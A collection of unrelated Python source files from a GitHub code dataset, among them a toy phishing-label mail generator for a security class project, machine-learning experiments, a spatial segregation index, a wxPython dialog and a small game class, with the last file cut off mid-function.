\"yahoo.com\", \"kent.edu\", \"sanyo.org\", \"ghost.cs.kent\"]\n\nsubject_safe = [\n \"Hello from us\",\n \"How waz the trip\",\n \"Help with the project\",\n \"Have you seen that video yet?\",\n \"Covid-19 update\",\n \"How we, a buisness, are responding to covid-19\",\n \"Very save email header\",\n \"Noting suspicios here\"]\n\nsubject_malitious = [\n \"urgent action neded\",\n \"Please fill out this form\",\n \"Data breach detected\",\n \"Plese help me wit all this money\"]\n\nbody_safe = [\n \"I need help getting my grades up...\",\n \"How was the trip, we missed you\",\n \"Computer security middterm\",\n \"Dungeons and Dragons Schedueling\"]\n\nbody_malitious = [\n \"[text](link) Use this link to give us all your money\",\n \"respond Immediately, we need all your money right now.\",\n \"Banking account information needed\",\n \"Revised Vacation & Sick Time Policy\",\n \"Very important info inside\",\n \"Netflix is our company and we are Netflix\",\n \"We are apple so respond Immediatly\"]\n\ndef getMail(time):\n safe = random.choice([-1, 0, 1])\n if safe == 1:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_safe), random.choice(body_safe), time, None), safe)\n if safe == -1:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_malitious), random.choice(body_malitious), time, None), safe)\n else:\n return (Mail(random.choice(email_names) + '@' + random.choice(email_ats), random.choice(subject_safe + subject_malitious), random.choice(body_safe + body_malitious), time, None), safe)\n","repo_name":"RyanYoak/Information-Security-Project","sub_path":"TestMail.py","file_name":"TestMail.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16738437111","text":"# Crie um programa que leia duas notas de um aluno e calcule sua média, mostrando uma mensagem no final, de acordo com a média atingida:\n# - Média abaixo de 5.0: REPROVADO\n# - Média entre 5.0 e 6.9: RECUPERAÇÃO\n# - Média 7 ou superior: APROVADO\n\nnota1 = float(input(\"Quanto foi sua primeira nota? \"))\nnota2 = float(input(\"Quanto foi sua segunda nota? \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(f\"Sua média foi de {media:.2f}!\")\nif media < 5:\n print(\"Você não atingiu a média! Infelizmente, você foi REPROVADO!\")\nelif media >= 5 and media <= 6.9:\n print(\"Você não atingiu a média, porém, terá outra chance! Você está de RECUPERAÇÃO!\")\nelse:\n print(\"Parabéns, sua nota foi acima da média! Você foi APROVADO!\")","repo_name":"luizfiliperm/Exercicios-Curso-Em-Video","sub_path":"mundo02/ex040.py","file_name":"ex040.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16147476328","text":"#!/usr/bin/python\n# coding: utf-8\n\nimport logging\nimport tensorflow as tf\nimport pickle\nimport time\nimport numpy as np\n\nfrom .adaptive.adaptive_nn import (ActiveNeuralNetwork,\n compute_score,\n TrueActiveNN)\nfrom .visualize_database import (plot_advancement_qdb_search,\n random_advancement_plot,\n plot_advancement_uncertainty_search,\n random_uncertainty_plot)\nfrom .sampling import initial_sampling, uncertainty_sampling\nfrom .qdbsampling import qdb_sampling, qdb_sampling_dependant\nimport tf_utils as utils\n\n\ndef active_search(X, y, shapes=[64, 1], max_iterations=501,\n pos_weights_path=\"./weights_pos.pckl\",\n neg_weights_path=\"./weights_neg.pckl\",\n main_weights_path=\"./weights_main_%s_iterations.pckl\",\n display_plot=True, plot_save_path=None, n_points=None,\n callback_save_path=None, nb_max_main_epoch=64000, qdb=True,\n random=True, xlim=None, ylim=None, timer_save_path=None,\n save_biased=True, include_background=False,\n evolutive_small=False, nb_background_points=None,\n nb_biased_epoch=10000, biased_lr=0.001,\n reduce_factor=2., pool_size=None,\n main_lr=0.001, nn_activation=\"relu\",\n nn_loss=\"binary_crossentropy\",\n background_sampling=\"uncertain\", doubleFilters=False):\n \"\"\"\n Run the active search with neural networks.\n\n Params:\n X (np.array): Data on which the data exploration will be done.\n y (np.array): Searched labels.\n shapes (list of integers): shapes of the nn used.\n max_iterations (integer): maximum number of iterations.\n pos_weights_path (string): where to save the positively biased weights.\n neg_weights_path (string): where to save the negatively biased weights.\n main_weights_path (string): where to save the weights of the main nn.\n display_plot (boolean): Shall the script display the advancement plots?\n plot_save_path (string): Where to save the advancement plots. If None,\n the plots will not be saved.\n n_points (integer): Number of points to plot. If None, every points\n will be plotted.\n callback_save_path (string): Where to save the callbacks. If None,\n the callbacks will not be saved.\n nb_max_main_epoch (int): maximum number of epochs for the main neural\n network during one step\n qdb (boolean): If True, use query by disagreement to choose the new\n sample. Else, use uncertainty sampling.\n random (boolean): If True, take a random sample in the disagreement\n region. Else, take the most uncertain. Not applyable if not qdb.\n xlim (2-uple of integers): limits of the x axis.\n ylim (2-uple of integers): limits of the y axis.\n timer_save_path (string): where to save the follow up of the time of\n execution. If None, it will not be saved.\n save_biased (boolean): If True, will save weights of positive and\n negative nns.\n include_background (boolean): If True, the stopping criterion of biased\n nns will include bacground_points.\n evolutive_small (boolean): Choose if the number of background points\n will change over time or not.\n nb_background_points (int): If evolutive_small, the number of\n background points will be set to nb_background_points times the\n number of labeled points. Else, it will sample nb_background_points\n at each step. The default value (when set to None) is 2 with\n evolutive_small and 200 without evolutive_small. \n nb_biased_epoch (integer): Number of epoch to do at the first step.\n biased_lr (real): Learning rate of biased neural networks.\n reduce_factor (real or string): The gradients of the biased sample will\n be divided by this factor. If None, it will be equal to\n len(biased_sample). If \"evolutive\", it will be equal to\n len(biased_samples) * 2. / X_train.shape[0].\n pool_size (integer): Size of the pool considered to find the most\n uncertain point. If None, the whole X is used.\n main_lr (real): Learning rate of the main model.\n nn_activation (string): activation functions of the neural networks\n nn_loss (string): loss of the neural networks\n background_sampling (string): If \"uncertain\", background points will be\n the most uncertain of the model. If \"random\", background points\n will be randomly sampled.\n doubleFilters (boolean): In the case of the biased neural network load\n the weights of the main nn at each step, these biased nns will have\n two times more parameters if doubleFilter is set to True.\n \"\"\"\n\n # Initialize variables\n\n timer = {\"sampling\": [],\n \"total\": [],\n \"main_nn\": [],\n \"iterations\": [],\n \"predictions\": [],\n \"saving_weights\": [],\n \"callback_treatment\": [],\n \"plots\": [],\n \"callback_save\": [],\n \"timer_save\": []}\n\n if qdb:\n for key in [\"background_points\", \"pos_nn\", \"neg_nn\",\n \"disagreement_point\"]:\n timer[key] = []\n\n t0 = time.time()\n graph_main = tf.Graph()\n input_shape = X.shape[1]\n\n reduce_factor_pos = reduce_factor\n reduce_factor_neg = reduce_factor\n\n current_lr = main_lr\n\n with graph_main.as_default():\n nn_main = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n\n if qdb and (pos_weights_path != main_weights_path):\n graph_pos = tf.Graph()\n graph_neg = tf.Graph()\n \n with graph_pos.as_default():\n nn_pos = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n with graph_neg.as_default():\n nn_neg = ActiveNeuralNetwork(\n input_shape=input_shape, hidden_shapes=shapes, batch_size=124,\n learning_rate=main_lr, activation=nn_activation, loss=nn_loss,\n )\n\n with tf.Session(graph=graph_main) as sess_main:\n\n tf.set_random_seed(42)\n sess_main.run(tf.global_variables_initializer())\n nb_epoch_main = 1000\n\n stopping_criterion = False\n # Loop over the iterations\n for iteration in range(2, max_iterations):\n\n if stopping_criterion:\n break\n\n t = time.time()\n timer[\"total\"].append(t - t0)\n\n logging.info(\"# Iteration %s #\" % iteration)\n\n if not evolutive_small:\n reduce_factor_pos = min(max(1, reduce_factor_pos * 0.9), 200)\n reduce_factor_neg = min(max(1, reduce_factor_neg * 0.9), 200)\n\n logging.info(\"reduce_factor pos %s neg %s\" % (reduce_factor_pos,\n reduce_factor_neg))\n\n # Test if it is the first iteration\n if iteration == 2:\n\n # Randomly sample one positive and one negative example\n samples = initial_sampling(y)\n X_train, y_train = X[samples], y[samples]\n\n uncertain_samples = range(X.shape[0])\n for i in samples:\n uncertain_samples.remove(i)\n X_val, y_val = X[uncertain_samples], y[uncertain_samples]\n\n tbis = time.time()\n timer[\"sampling\"].append(tbis - t)\n t = tbis\n logging.info(\"Initial sampling done\")\n\n # Train the neural network\n callback = nn_main.training(sess_main, X_train, y_train,\n n_epoch=100000, display_step=1000,\n stop_at_1=True, saving=False)\n\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n\n callback[\"samples\"] = samples\n\n tbis = time.time()\n timer[\"main_nn\"].append(tbis - t)\n t = tbis\n\n # First prediction\n old_pred = sess_main.run(\n nn_main.prediction,\n feed_dict={nn_main.input_tensor: X_val}\n )\n\n tbis = time.time()\n timer[\"predictions\"].append(tbis - t)\n t = tbis\n\n val_score = compute_score(nn_main, X, y, sess_main)\n logging.info(\"Validation F1 score: %s\" % val_score)\n\n callback[\"validation_error\"] = [val_score]\n callback[\"training_error\"] = [callback[\"training_error\"][-1]]\n\n tbis = time.time()\n timer[\"callback_treatment\"].append(tbis - t)\n timer[\"iterations\"].append(t - timer[\"total\"][-1] - t0)\n\n else:\n repeat = True\n while repeat:\n repeat = False\n if qdb:\n if (main_weights_path != pos_weights_path):\n (sample, pred_pos, pred_neg, biased_samples, times,\n reduce_factor_pos_new, reduce_factor_neg_new) = (\n qdb_sampling(nn_main, sess_main, X_train, y_train,\n X_val, y_val, iteration, nn_pos,\n graph_pos, pos_weights_path, nn_neg,\n graph_neg, neg_weights_path,\n random=random, save=save_biased,\n evolutive_small=evolutive_small,\n nb_background_points=nb_background_points,\n nb_biased_epoch=nb_biased_epoch,\n reduce_factor_pos=reduce_factor_pos,\n reduce_factor_neg=reduce_factor_neg,\n pool_size=pool_size)\n )\n else:\n (sample, pred_pos, pred_neg, biased_samples, times,\n reduce_factor_pos_new, reduce_factor_neg_new) = (\n qdb_sampling_dependant(nn_main, sess_main, X_train, y_train,\n X_val, y_val, iteration, main_weights_path,\n random=random, save=save_biased,\n evolutive_small=evolutive_small,\n nb_background_points=nb_background_points,\n nb_biased_epoch=nb_biased_epoch,\n reduce_factor_pos=reduce_factor_pos,\n reduce_factor_neg=reduce_factor_neg,\n pool_size=pool_size,\n doubleFilters=doubleFilters)\n )\n modif_pos = (reduce_factor_pos_new != reduce_factor_pos)\n modif_neg = (reduce_factor_neg_new != reduce_factor_neg)\n\n reduce_factor_pos = reduce_factor_pos_new\n reduce_factor_neg = reduce_factor_neg_new\n\n for i, key in enumerate([\n \"background_points\", \"pos_nn\", \"neg_nn\",\n \"disagreement_point\"\n ]):\n timer[key].append(times[i])\n else:\n sample = uncertainty_sampling(nn_main, sess_main,\n X_val,\n pool_size=pool_size)\n\n X_train = np.vstack((X_train,\n X_val[sample].reshape((1, -1))))\n y_train = np.vstack((y_train,\n y_val[sample].reshape((1, 1))))\n\n if qdb:\n if samples == 0:\n biased_samples = [i - 1 for i in biased_samples]\n elif sample != (X_val.shape[0] - 1):\n biased_samples = [i - 1 if i > sample else i\n for i\n in biased_samples]\n\n for variable in [X_val, y_val, pred_pos, pred_neg,\n old_pred]:\n variable = np.delete(variable, sample, 0)\n else:\n for variable in [X_val, y_val]:\n variable = np.delete(variable, sample, 0)\n\n tbis = time.time()\n timer[\"sampling\"].append(tbis - t)\n t = tbis\n\n logging.info(\"New sample is %s\" % bool(y_train[-1]))\n\n # Train the main nn with the new samples\n logging.info(\"Training main model\")\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=nb_epoch_main,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True,\n )\n\n tbis = time.time()\n timer[\"main_nn\"].append(tbis - t)\n t = tbis\n\n # Save the weights\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n\n tbis = time.time()\n timer[\"saving_weights\"].append(tbis - t)\n t = tbis\n\n callback[\"training_error\"].append(temp[\"training_error\"][-1])\n\n # If the model did not converge, increase maximum training time\n # next time\n if (callback[\"training_error\"][-1] < 0.95):\n if (2 * nb_epoch_main) >= nb_max_main_epoch:\n nb_epoch_main = nb_max_main_epoch\n else:\n nb_epoch_main *= 2\n\n # adapt reduce_factor\n if modif_pos and modif_neg:\n nn_main.increase_complexity(sess_main)\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=nb_epoch_main * 10,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True, decrease=False\n )\n if temp[\"training_error\"][-1] < 0.95:\n logging.info(\"RESET !\")\n sess_main.run(tf.global_variables_initializer())\n temp = nn_main.training(\n sess_main, X_train, y_train, n_epoch=100000,\n display_step=100000, saving=False, stop_at_1=True,\n callback=True, decrease=False\n )\n if \"%s\" in main_weights_path:\n utils.saver(\n nn_main.params,\n sess_main,\n main_weights_path % iteration\n )\n else:\n utils.saver(nn_main.params, sess_main, main_weights_path)\n if main_weights_path != pos_weights_path:\n with tf.Session(graph_pos) as sess_pos:\n nn_pos.increase_complexity(sess_pos)\n with tf.Session(graph_neg) as sess_neg:\n \n nn_neg.increase_complexity(sess_neg)\n if ((iteration>3) and ((callback[\"training_error\"][-1] != 1) or \n (callback[\"training_error\"][-2] != 1))):\n if modif_pos:\n reduce_factor_pos /= 2.\n if modif_neg:\n reduce_factor_neg /= 2.\n\n tbis = time.time()\n timer[\"callback_treatment\"].append(tbis - t)\n t = tbis\n\n val_score = compute_score(nn_main, X, y, sess_main)\n callback[\"validation_error\"].append(val_score)\n\n logging.info(\"Validation F1 score: %s\" % val_score)\n tbis = time.time()\n timer[\"predictions\"].append(tbis - t)\n t = tbis\n\n stopping_criterion = (val_score > 0.99)\n\n if (display_plot or (plot_save_path is not None)):\n # Predict with current model\n new_pred = sess_main.run(\n nn_main.prediction,\n feed_dict={nn_main.input_tensor: X_val}\n )\n\n # Plot the progress\n psp = plot_save_path\n if (psp is not None) and (\"%s\" in psp):\n psp = plot_save_path % iteration\n\n if qdb:\n if n_points is None:\n plot_advancement_qdb_search(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, pred_pos, pred_neg, biased_samples,\n save_path=psp, show=display_plot, xlim=xlim,\n ylim=ylim\n )\n else:\n random_advancement_plot(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, pred_pos, pred_neg, biased_samples,\n n_points, save_path=psp, show=display_plot,\n xlim=xlim, ylim=ylim\n )\n else:\n if n_points is None:\n plot_advancement_uncertainty_search(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, save_path=psp, show=display_plot,\n xlim=xlim, ylim=ylim\n )\n else:\n random_uncertainty_plot(\n X_train, y_train, X_val, y_val, old_pred,\n new_pred, n_points=n_points, save_path=psp,\n show=display_plot, xlim=xlim, ylim=ylim)\n\n old_pred = new_pred\n tbis = time.time()\n timer[\"plots\"].append(tbis - t)\n t = tbis\n\n logging.info(\"Saving Callback\")\n # Complete the callback\n callback[\"samples\"].append(sample)\n\n # Save the callback\n if callback_save_path is not None:\n with open(callback_save_path, \"w\") as fp:\n pickle.dump(callback, fp)\n\n tbis = time.time()\n timer[\"callback_save\"].append(tbis - t)\n t = tbis\n\n # Save the timer\n if timer_save_path is not None:\n with open(timer_save_path, \"w\") as fp:\n pickle.dump(timer, fp)\n\n tbis = time.time()\n timer[\"timer_save\"].append(tbis - t)\n\n timer[\"iterations\"].append(tbis - timer[\"total\"][-1] - t0)\n\n logging.info(\"ENF OF STORY BRO\")\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"AlexandreSev/neural_aide","sub_path":"neural_aide/active_search.py","file_name":"active_search.py","file_ext":"py","file_size_in_byte":20685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19643795762","text":"\"\"\"CLI interface using argparse.ArgumentParser\"\"\"\n\nfrom argparse import ArgumentParser\nfrom os import PathLike, getcwd\nfrom os.path import join as path_join, isfile\nfrom glob import iglob\n\n\ndef get_cli_parser():\n parser = ArgumentParser(description='Topic modelling utility')\n\n parser.add_argument(\n 'input_dir',\n help='Directory where input text files are located.',\n type=str\n )\n parser.add_argument(\n '--subdir',\n help='Subdir to choose from',\n type=str\n )\n parser.add_argument(\n '-m', '--model',\n help='Path to pretrained topic model',\n type=str\n )\n parser.add_argument(\n '-i', '--infer',\n help='Use specified model to infer on new dataset',\n type=str\n )\n parser.add_argument(\n '-t', '--type',\n help='\"lda\", \"nmf\", \"top2vec\" or \"topic2vec\"',\n default='lda',\n choices=['lda', 'nmf', 'top2vec', 'topic2vec'],\n type=str\n )\n parser.add_argument(\n '-s', '--stopwords',\n help='Path to text file containing stopwords to add',\n default=None,\n type=str\n )\n parser.add_argument(\n '-l', '--logdir',\n help='Directory to dump logs to. Default is $PWD/logs',\n default=getcwd(),\n type=str\n )\n return parser\n\n\ndef get_files(path: PathLike):\n files = iglob(path_join(path, '**/*.txt'), recursive=True)\n for file in files:\n if isfile(file):\n yield file\n\n\ndef get_text(path: PathLike):\n text = []\n with open(path) as f:\n for line in f:\n text.append(line)\n\n return \" \".join(text)\n","repo_name":"mkls6/topic_modeling","sub_path":"src/pkg/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1380796650","text":"import torch\nimport torch.nn as nn\n\ndef complex_multiplication(input_tensor: torch.Tensor, other_tensor: torch.Tensor) -> torch.Tensor:\n complex_index = -1\n real_part = input_tensor[..., 0] * other_tensor[..., 0] - input_tensor[..., 1] * other_tensor[..., 1]\n imaginary_part = input_tensor[..., 0] * other_tensor[..., 1] + input_tensor[..., 1] * other_tensor[..., 0]\n multiplication = torch.cat(\n [\n real_part.unsqueeze(dim=complex_index),\n imaginary_part.unsqueeze(dim=complex_index),\n ],\n dim=complex_index,\n )\n return multiplication\n\nclass ComplexMul_ver0(nn.Module):\n def __init__(self):\n super(ComplexMul_ver0, self).__init__()\n\n def forward(self, x, y):\n return complex_multiplication(x, y)\n\nclass ComplexMul_ver1(torch.autograd.Function):\n @staticmethod\n def symbolic(g, input_tensor, other_tensor, is_conj = True):\n return g.op(\"ComplexMultiplication\", input_tensor, other_tensor, is_conj_i=int(is_conj))\n\n @staticmethod\n def forward(self, input_tensor, other_tensor):\n multiplication = complex_multiplication(input_tensor, other_tensor)\n '''\n complex_index = -1\n real_part = input_tensor[..., 0] * other_tensor[..., 0] - input_tensor[..., 1] * other_tensor[..., 1]\n imaginary_part = input_tensor[..., 0] * other_tensor[..., 1] + input_tensor[..., 1] * other_tensor[..., 0]\n\n multiplication = torch.cat(\n [\n real_part.unsqueeze(dim=complex_index),\n imaginary_part.unsqueeze(dim=complex_index),\n ],\n dim=complex_index,\n )\n '''\n return multiplication\n\n","repo_name":"alanzhai219/OpenVINO_Tutorial","sub_path":"2_Extend/model_export/complex_mul.py","file_name":"complex_mul.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4249870109","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\n\n\ndef normalize_transform(to_normalize, column_index, max_value, min_value):\n to_normalize[:, column_index] = (to_normalize[:, column_index] - min_value) / (max_value - min_value)\n return to_normalize\n\ndef get_accuracy_f1(prediction_index, test_labels):\n n_labels = int(np.max(test_labels) + 1)\n set_size = test_labels.shape[0]\n\n # inizializzo i parametri\n FP = 0\n FN = 0\n TP = 0\n TN = 0\n\n for i in range(n_labels):\n for j in range(set_size):\n\n if test_labels[j] >= i:\n if prediction_index[j] >= i:\n TP += 1\n else:\n FN += 1\n else:\n if prediction_index[j] != i:\n TN += 1\n else:\n FP += 1\n\n P = TP / (TP + FP) # precision\n R = TP / (TP + FN) # recall\n\n F1 = (2 * P * R) / (P + R) # f1 score\n return F1\n\n\nx, y = datasets.load_diabetes(return_X_y=True)\nx = x[:, np.newaxis, 2]\nx=x[:-20]\ny=y[:-20]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42) #70% dati 30% test\n\nnormalized_train = x_train\nnormalized_test = x_test\n\niteration=x.shape[1] #normalizzazione (non serve in questo caso)\nfor i in range(iteration):\n max = np.max(x_train[:, i])\n min = np.min(x_train[:, i])\n normalized_train = normalize_transform(normalized_train, i, max, min)\n normalized_test = normalize_transform(normalized_test, i, max, min)\nx_com_std = np.vstack((normalized_train,normalized_test))\ny_com_std = np.hstack((y_train,y_test))\n\n#regressione logistica su 100 iterazioni\nlog_model = LogisticRegression(C=100.0, random_state=0)\nlog_model.fit(x_train, y_train)\nresult = log_model.predict(x_test)\nplt.scatter(x_train,y_train)\nplt.show()\nplt.scatter(result,y_test)\nplt.show()\naccuracy_log = get_accuracy_f1(result,y_test)\nprint(\"Accuratezza con reg. logistica: \",accuracy_log)\n\n# regressione lineare (non ottimale su questo dataset)\nlin_model = LinearRegression()\nlin_model.fit(x_train, y_train)\nlin_result = lin_model.predict(x_test)\nplt.scatter(lin_result,y_test)\nplt.show()\naccuracy_lin= get_accuracy_f1(lin_result,y_test)\nprint(\"Accuratezza con reg. lineare: \",accuracy_lin)","repo_name":"vincydesy/Statistical-Learning","sub_path":"Regression.py","file_name":"Regression.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3329946440","text":"\"\"\"Multigroup Relative Centralization index\"\"\"\n\n__author__ = \"Renan X. Cortes , Sergio J. Rey and Elijah Knaap \"\n\nimport libpysal as lps\nimport numpy as np\nfrom segregation.singlegroup import RelativeCentralization\n\nfrom .._base import MultiGroupIndex, SpatialExplicitIndex\n\nnp.seterr(divide=\"ignore\", invalid=\"ignore\")\n\n\ndef _local_relative_centralization(data, group_pop_var, total_pop_var, W=None, k=5):\n \"\"\"\n Calculation of Local Relative Centralization index for each unit\n\n Parameters\n ----------\n\n data : a geopandas DataFrame with a geometry column.\n \n group_pop_var : string\n The name of variable in data that contains the population size of the group of interest\n \n total_pop_var : string\n The name of variable in data that contains the total population of the unit\n \n k_neigh : integer greater than 0. Default is 5.\n Number of assumed neighbors for local context (it uses k-nearest algorithm method)\n \n Returns\n -------\n\n statistics : np.array(n)\n Local Relative Centralization values for each unit\n \n core_data : a pandas DataFrame\n A pandas DataFrame that contains the columns used to perform the estimate.\n\n Notes\n -----\n Based on Folch, David C., and Sergio J. Rey. \"The centralization index: A measure of local spatial segregation.\" Papers in Regional Science 95.3 (2016): 555-576.\n \n Reference: :cite:`folch2016centralization`.\n \"\"\"\n\n data = data.copy()\n if not W:\n W = lps.weights.KNN.from_dataframe(data, k=5)\n\n core_data = data[[group_pop_var, total_pop_var, data.geometry.name]]\n\n c_lons = data.centroid.map(lambda p: p.x)\n c_lats = data.centroid.map(lambda p: p.y)\n\n points = list(zip(c_lons, c_lats))\n kd = lps.cg.kdtree.KDTree(np.array(points))\n\n local_RCEs = np.empty(len(data))\n\n for i in range(len(data)):\n\n x = list(W.neighbors.values())[i]\n x.append(\n list(W.neighbors.keys())[i]\n ) # Append in the end the current unit i inside the local context\n\n local_data = data.iloc[x, :].copy()\n\n # The center is given by the last position (i.e. the current unit i)\n local_RCE = RelativeCentralization(\n local_data, group_pop_var, total_pop_var, center=len(local_data) - 1\n )\n\n local_RCEs[i] = local_RCE.statistic\n\n return local_RCEs, core_data\n\n\nclass LocalRelativeCentralization(MultiGroupIndex, SpatialExplicitIndex):\n \"\"\"Multigroup Local Simpson's Concentration Index.\n\n Parameters\n ----------\n data : pandas.DataFrame or geopandas.GeoDataFrame, required\n dataframe or geodataframe if spatial index holding data for location of interest\n groups : list, required\n list of columns on dataframe holding population totals for each group\n w : libpysal.W, optional\n lipysal spatial weights object used to define a local neighborhood. If none is passed,\n a KNN ojbect with k=5 will be used\n network : pandana.Network\n pandana Network object representing the study area\n distance : int\n Maximum distance (in units of geodataframe CRS) to consider the extent of the egohood\n decay : str\n type of decay function to apply. Options include\n precompute : bool\n Whether to precompute the pandana Network object\n\n Attributes\n ----------\n statistic : float\n Multigroup Dissimilarity Index value\n core_data : a pandas DataFrame\n DataFrame that contains the columns used to perform the estimate.\n\n Notes\n -----\n Based on Folch, David C., and Sergio J. Rey. \"The centralization index: A measure of local spatial segregation.\" Papers in Regional Science 95.3 (2016): 555-576.\n \n Reference: :cite:`folch2016centralization`.\n \"\"\"\n\n def __init__(\n self,\n data,\n group_pop_var=None,\n total_pop_var=None,\n w=None,\n network=None,\n distance=None,\n decay=None,\n precompute=None,\n groups=None,\n ):\n \"\"\"Init.\"\"\"\n\n MultiGroupIndex.__init__(self, data, groups)\n if any([w, network, distance]):\n SpatialExplicitIndex.__init__(self)\n aux = _local_relative_centralization(\n self.data, group_pop_var=group_pop_var, total_pop_var=total_pop_var, W=w\n )\n\n self.statistics = aux[0]\n self.data = aux[1]\n self._function = _local_relative_centralization\n","repo_name":"pysal/segregation","sub_path":"segregation/local/local_relative_centralization.py","file_name":"local_relative_centralization.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"37"} +{"seq_id":"10902786176","text":"import wx\n\nclass ProgressDialog(wx.Dialog):\n def __init__(self, parent, currentRunningThread, parentDialog):\n if parentDialog:\n wx.Dialog.__init__(self, parentDialog, wx.ID_ANY, \"Progress information\", size= (610,222))\n else:\n wx.Dialog.__init__(self, parent, wx.ID_ANY, \"Progress information\", size= (610,222))\n self.parent = parent\n self.parent.setCancelProgress(False)\n self.thread = currentRunningThread\n self.panel = wx.Panel(self,wx.ID_ANY)\n self.gauge = wx.Gauge(self.panel,size=(582,20),pos=(12,80), style=wx.GA_HORIZONTAL)\n self.textLabel = wx.StaticText(self.panel, label=\"Operation in progress...\", pos=(12,20))\n self.cancelButton =wx.Button(self.panel, size=(105,27), label=\"Cancel\", pos=(490,155))\n self.cancelButton.Bind(wx.EVT_BUTTON, self.OnQuit)\n self.Bind(wx.EVT_CLOSE, self.OnQuit)\n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER,self.OnTimer, self.timer)\n self.timer.Start(30)\n self.gauge.SetRange(500)\n self.gauge.SetValue(0)\n self.step = 1\n self.Show()\n\n def OnTimer(self, evt):\n if self.thread.isAlive():\n x = int(self.gauge.GetValue())\n if x >= 500:\n x = 0\n x += self.step\n self.gauge.SetValue(x)\n else:\n self.OnQuit(None)\n\n def OnQuit(self, event):\n if self.thread.isAlive():\n self.parent.setCancelProgress(True)\n self.parent.stopCurrentProcess()\n self.thread.join()\n self.timer.Stop()\n self.Destroy()\n\n","repo_name":"OpenClovis/SAFplus-Availability-Scalability-Platform","sub_path":"src/ide/progressdialog.py","file_name":"progressdialog.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"161608111","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n\t\"\"\"A class that manages the bullets shot by the spaceship.\"\"\"\n\t\n\tdef __init__(self, ai_settings, screen, ship):\n\t\t\"\"\"\n\t\tCreates an object of the bullet on the the spaceship current \n\t\tposition.\n\t\t\"\"\"\n\t\tsuper(Bullet, self).__init__()\n\t\tself.screen = screen\n\t\t\n\t\t# Creates a rectangle for the project in (0,0) then defines the\n\t\t# correct position\n\t\tself.rect = pygame.Rect(0, 0, ai_settings.bullet_width,\n\t\t\tai_settings.bullet_height)\n\t\tself.rect.centerx = ship.rect.centerx\n\t\tself.rect.top = ship.rect.top\n\t\t\n\t\t# Stores the bullet current position with a decimal value\n\t\tself.y = float(self.rect.y)\n\t\t\n\t\tself.color = ai_settings.bullet_color\n\t\tself.speed_factor = ai_settings.bullet_speed_factor\n\t\t\n\tdef update(self):\n\t\t\"\"\"Moves the the bullet up on the screen.\"\"\"\n\t\t# Updates the bullet decimals position\n\t\tself.y -= self.speed_factor\n\t\t# Updates the rect's position\n\t\tself.rect.y = self.y\n\t\t\n\tdef draw_bullet(self):\n\t\t\"\"\"Draws the bullet on the screen.\"\"\"\n\t\tpygame.draw.rect(self.screen, self.color, self.rect)\n","repo_name":"Kalviskin/alien_invasion","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4943529493","text":"import tensorflow as tf\nimport numpy as np\nfrom agents.agent_base import AgentBase\n\n\nclass ForwardAgent(AgentBase):\n def __init__(self,\n name,\n model,\n env,\n verbose=False):\n\n AgentBase.__init__(self, name, model, env)\n\n self.opt = tf.train.AdamOptimizer()\n\n self.verbose = verbose\n\n self.grads = tf.gradients(self.model.value, self.model.trainable_variables)\n\n self.grads_s = [tf.placeholder(tf.float32, shape=tvar.get_shape()) for tvar in self.model.trainable_variables]\n\n self.apply_grads = self.opt.apply_gradients(zip(self.grads_s, self.model.trainable_variables),\n name='apply_grads')\n\n def train(self, epsilon):\n\n lamda = 0.7\n\n self.env.reset()\n\n grads_seq = []\n value_seq = []\n reward = self.env.get_reward()\n\n while reward is None:\n feature_vector = self.env.make_feature_vector(self.env.board)\n value, grads = self.sess.run([self.model.value, self.grads],\n feed_dict={self.model.feature_vector_: feature_vector})\n value_seq.append(value)\n grads_seq.append(grads)\n\n if np.random.random() < epsilon:\n self.env.make_random_move()\n 